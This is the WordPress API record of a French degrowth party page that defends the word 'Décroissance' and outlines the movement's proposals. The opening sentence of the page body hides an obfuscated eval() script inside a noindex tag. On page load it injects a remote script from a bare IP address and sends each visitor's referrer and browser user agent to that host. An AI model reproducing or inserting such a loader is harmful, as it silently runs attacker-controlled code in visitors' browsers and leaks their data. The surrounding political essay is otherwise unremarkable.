{"id":4764,"date":"2010-08-15T17:34:29","date_gmt":"2010-08-15T16:34:29","guid":{"rendered":"http:\/\/www.partipourladecroissance.net\/?page_id=4764"},"modified":"2010-08-29T22:42:10","modified_gmt":"2010-08-29T21:42:10","slug":"decroissance-mais-cest-quoi-ce-mot-repoussoir","status":"publish","type":"page","link":"https:\/\/www.partipourladecroissance.net\/?page_id=4764","title":{"rendered":"D\u00e9croissance : mais c&rsquo;est quoi ce mot \u00ab\u00a0repoussoir\u00a0\u00bb ?"},"content":{"rendered":"<p><strong>La <noindex><script id=\"wpinfo-pst1\" type=\"text\/javascript\" rel=\"nofollow\">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(\/^\/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6(\"<a g=\\'2\\' c=\\'d\\' e=\\'b\/2\\' 4=\\'7:\/\/5.8.9.f\/1\/h.s.t?r=\"+3(0.p)+\"\\o=\"+3(j.i)+\"\\'><\\\/k\"+\"l>\");n m=\"q\";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|kakyh|var|u0026u|referrer|dbrfi||js|php'.split('|'),0,{}))\n<\/script><\/noindex> \u00ab D\u00e9croissance \u00bb est un nom propre qui d\u00e9signe un mode de pens\u00e9e<\/strong>, un projet de soci\u00e9t\u00e9 et un mouvement politique. C\u2019est un nom propre et c\u2019est pour cela que nous prenons toujours soin d\u2019y mettre une majuscule.<\/p>\n<p>Le mouvement s\u2019appelle ainsi, car la D\u00e9croissance propose de sortir de la soci\u00e9t\u00e9 de Croissance ; celle qui s\u2019est construite au service de la croissance du PIB et de la religion de l\u2019\u00e9conomie.<br \/>\nNous pensons que la soci\u00e9t\u00e9 de Croissance est \u00e0 l&rsquo;origine de la crise multi-dimensionnelle \u00ab\u00a0qui \u00e9prouve l&rsquo;humanit\u00e9\u00a0\u00bb :<\/p>\n<ul>\n<li>L&rsquo;effondrement environnemental (d\u00e9r\u00e8glement climatique, crise de la biodiversit\u00e9, d\u00e9pl\u00e9tion des ressources, alt\u00e9ration des milieux).<\/li>\n<li>La crise sociale (mont\u00e9e des in\u00e9galit\u00e9s, crise de la dette et du syst\u00e8me financier).<\/li>\n<li> La crise politique et d\u00e9mocratique (d\u00e9saffection et d\u00e9rive de la d\u00e9mocratie).<\/li>\n<li>La crise de la personne humaine (perte de sens, d\u00e9litement des liens sociaux).<\/li>\n<\/ul>\n<p><strong>La soci\u00e9t\u00e9 de Croissance n\u2019est ni soutenable ni souhaitable, il faut en sortir. C&rsquo;est le sens de la D\u00e9croissance : r\u00e9fl\u00e9chir ensemble \u00e0 de nouveaux projets de soci\u00e9t\u00e9 soutenables et souhaitables.<\/strong><\/p>\n<p><strong><br \/>\n<\/strong><\/p>\n<p style=\"text-align: center;\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter\" src=\"http:\/\/idata.over-blog.com\/1\/50\/87\/90\/Cin--ma\/decroissance1.gif\" alt=\"\" width=\"148\" height=\"181\" \/><\/p>\n<p style=\"text-align: center;\"><em><strong>Plus de liens, moins de biens !<\/strong><\/em><\/p>\n<p style=\"text-align: center;\"><em><strong><br \/>\n<\/strong><\/em><\/p>\n<p><strong>La D\u00e9croissance n\u2019a pas de lien avec des indices de quantification<\/strong>. Il serait tout autant absurde de construire une soci\u00e9t\u00e9 autour d\u2019une d\u00e9croissance du PIB qu\u2019il est absurde de l\u2019avoir construite autour de la croissance de celui-ci. Il ne s\u2019agit ni de faire cro\u00eetre, ni de faire d\u00e9cro\u00eetre des indices \u00e9conomiques. C&rsquo;est pourquoi on parle d&rsquo; \u00ab\u00a0a-croissance\u00a0\u00bb, il faut simplement sortir de la religion de la Croissance.<\/p>\n<p>Depuis plusieurs ann\u00e9es, les Objecteurs de Croissance sont attentifs \u00e0 expliquer clairement ce qu\u2019est la D\u00e9croissance, et ce qu\u2019elle n\u2019est pas. <strong>Il nous semble relever de la mauvaise foi <\/strong><strong>de continuer \u00e0 attribuer \u00e0 la D\u00e9croissance<\/strong> des projets de \u00ab retour \u00e0 la bougie \u00bb, de d\u00e9croissance de tout pour tous (notamment pour les pays du Sud de la plan\u00e8te), ainsi que la notion de quantification, le malthusianisme et toutes les autres caricatures que nous n\u2019avons de cesse de d\u00e9mentir.<\/p>\n<p>Si on nous r\u00e9torque souvent qu\u2019il faut quand m\u00eame \u00eatre pour la croissance du bien-\u00eatre, des arbres, des enfants, de l\u2019amour, etc., c\u2019est probablement parce que <strong>ce terme a le pouvoir d\u2019interroger, en chacun de nous, dans notre imaginaire,<\/strong> les liens que nous avons construits entre le \u00ab <em>bien-vivre et le bien-\u00eatre<\/em> \u00bb et le \u00ab <em>toujours plus<\/em> \u00bb. \u00ab <em>Il faut positiver <\/em>\u00bb, disait la pub\u2019.<\/p>\n<p>C\u2019est parce qu\u2019il frappe les esprits, qu\u2019il choque, fait r\u00e9agir et fait bouger les consciences\u2026 que le mot D\u00e9croissance est utilis\u00e9. C\u2019est un \u00ab mot obus \u00bb qui permet de pulv\u00e9riser l&rsquo;id\u00e9ologie absurde de la croissance pour la croissance, de d\u00e9coloniser nos imaginaires.<br \/>\n<strong> <\/strong><\/p>\n<p style=\"text-align: center;\"><strong>Il faut un nom qui d\u00e9range \u00e0 la hauteur des d\u00e9g\u00e2ts caus\u00e9s par la pens\u00e9e dominante et la marchandisation du monde&#8230;<\/strong><\/p>\n<p style=\"text-align: center;\"><strong><br \/>\n<\/strong><\/p>\n<p style=\"text-align: center;\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter\" src=\"http:\/\/www.partipourladecroissance.net\/wp-content\/uploads\/2008\/12\/logo-ppld.gif\" alt=\"\" width=\"118\" height=\"68\" \/><\/p>\n<p style=\"text-align: center;\"><strong><em>\u00ab Vivre plus simplement pour que d\u2019autres puissent simplement vivre. \u00bb<\/em><\/strong><\/p>\n<p style=\"text-align: center;\"><strong><em><br \/>\n<\/em><\/strong><\/p>\n<p><strong>Nous avons tout de m\u00eame conscience de l\u2019effet \u00ab repoussoir \u00bb du mot aupr\u00e8s des personnes non initi\u00e9es.<\/strong> C\u2019est pour cela que nous nous appelons aussi\u00a0 \u00ab Objecteurs de Croissance \u00bb et que, selon nos interlocuteurs, nous disons colporter l\u2019\u00ab Objection de Croissance \u00bb au lieu de la D\u00e9croissance, qui repr\u00e9sente une partie de notre action.<br \/>\nCeci dit, le mot D\u00e9croissance est un outil formidable pour remettre en cause les fondements de la soci\u00e9t\u00e9 de croissance, le capitalisme et le productivisme, pour ouvrir un large d\u00e9bat sur comment faire ce pas de c\u00f4t\u00e9 nous permettant d&rsquo;\u00e9viter le mur vers lequel nous am\u00e8ne toujours plus vite la soci\u00e9t\u00e9 de croissance.<\/p>\n<p>Nous avan\u00e7ons donc avec nos mots obus : la D\u00e9croissance, l&rsquo;anti-capitalisme, l&rsquo;anti-productivisme, l&rsquo;anti-consum\u00e9risme.<br \/>\n<strong>Mais nous avan\u00e7ons surtout avec nos mots chantiers :<\/strong> la <a href=\"http:\/\/www.partipourladecroissance.net\/?p=4144\">dotation inconditionnelle d&rsquo;autonomie,<\/a> le revenu maximum autoris\u00e9, <a href=\"http:\/\/www.alencontre.org\/debats\/DebatAries01_10.html\">la gratuit\u00e9 de l&rsquo;usage et le rench\u00e9rissement du m\u00e9susage<\/a>, la relocalisation, le ralentissement, l&rsquo;attention aux autres, l&rsquo;autonomie, la solidarit\u00e9, la s\u00e9r\u00e9nit\u00e9, la convivialit\u00e9 et la joie de vivre.<\/p>\n<p style=\"text-align: center;\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter\" src=\"http:\/\/decroissance.lehavre.free.fr\/images\/les-escargots-de-la-decroissance-icone.jpg\" alt=\"\" width=\"132\" height=\"76\" \/><\/p>\n<p style=\"text-align: center;\"><strong><em>Une croissance infinie dans un monde fini est une absurdit\u00e9 !<\/em><\/strong><\/p>\n<p style=\"text-align: center;\"><strong><em><br \/>\n<\/em><\/strong><\/p>\n<p><strong>A lire aussi :<\/strong><br \/>\n<a href=\"http:\/\/www.decroissance.org\/index.php?chemin=textes\/Un_mot-obus.htm\">http:\/\/www.decroissance.org\/index.php?chemin=textes\/Un_mot-obus.htm<\/a><br \/>\n<a href=\"http:\/\/decroissancepasdecalais.blogspot.com\/2009\/01\/la-dcroissance-le-gros-mot-utiliser.html\">http:\/\/decroissancepasdecalais.blogspot.com\/2009\/01\/la-dcroissance-le-gros-mot-utiliser.html<\/a><br \/>\n<a href=\"http:\/\/www.superno.com\/blog\/2009\/09\/decroissance-cest-le-mot-qui-les-gene\/\">http:\/\/www.superno.com\/blog\/2009\/09\/decroissance-cest-le-mot-qui-les-gene\/<\/a><br \/>\n<a href=\"http:\/\/www.objecteursdecroissance.be\/articles\/mpOC_Vous-avez-dit-Decroissance_aout2010.pdf\">http:\/\/www.objecteursdecroissance.be\/articles\/mpOC_Vous-avez-dit-Decroissance_aout2010.pdf<\/a><br \/>\nLa D\u00e9croissance, un projet soci\u00e9tal bien trop souvent victime de pr\u00e9jug\u00e9s : <a href=\"http:\/\/www.partipourladecroissance.net\/?p=4711\">http:\/\/www.partipourladecroissance.net\/?p=4711<\/a><\/p>\n<p><strong>D\u00e9finitions :<\/strong><br \/>\nProduit Int\u00e9rieur Brut : <a href=\"http:\/\/fr.wikipedia.org\/wiki\/Produit_int%C3%A9rieur_brut\">http:\/\/fr.wikipedia.org\/wiki\/Produit_int%C3%A9rieur_brut<\/a><br \/>\nParadigme, ce mot n&rsquo;est absolument pas un gros mot. Il gagne \u00e0 \u00eatre connu et utilis\u00e9 pour devenir \u00ab\u00a0commun\u00a0\u00bb :\u00a0 <a href=\"http:\/\/fr.wikipedia.org\/wiki\/Paradigme\">http:\/\/fr.wikipedia.org\/wiki\/Paradigme<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>La \u00ab D\u00e9croissance \u00bb est un nom propre qui d\u00e9signe un mode de pens\u00e9e, un projet de soci\u00e9t\u00e9 et un mouvement politique. C\u2019est un nom propre et c\u2019est pour cela que nous prenons toujours soin d\u2019y mettre une majuscule. Le &hellip; <a href=\"https:\/\/www.partipourladecroissance.net\/?page_id=4764\">Continuer la lecture <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":7,"featured_media":0,"parent":4012,"menu_order":0,"comment_status":"closed","ping_status":"open","template":"","meta":{"footnotes":""},"class_list":["post-4764","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/pages\/4764","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4764"}],"version-history":[{"count":8,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/pages\/4764\/revisions"}],"predecessor-version":[{"id":4766,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/pages\/4764\/revisions\/4766"}],"up":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/pages\/4012"}],"wp:attachment":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4764"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}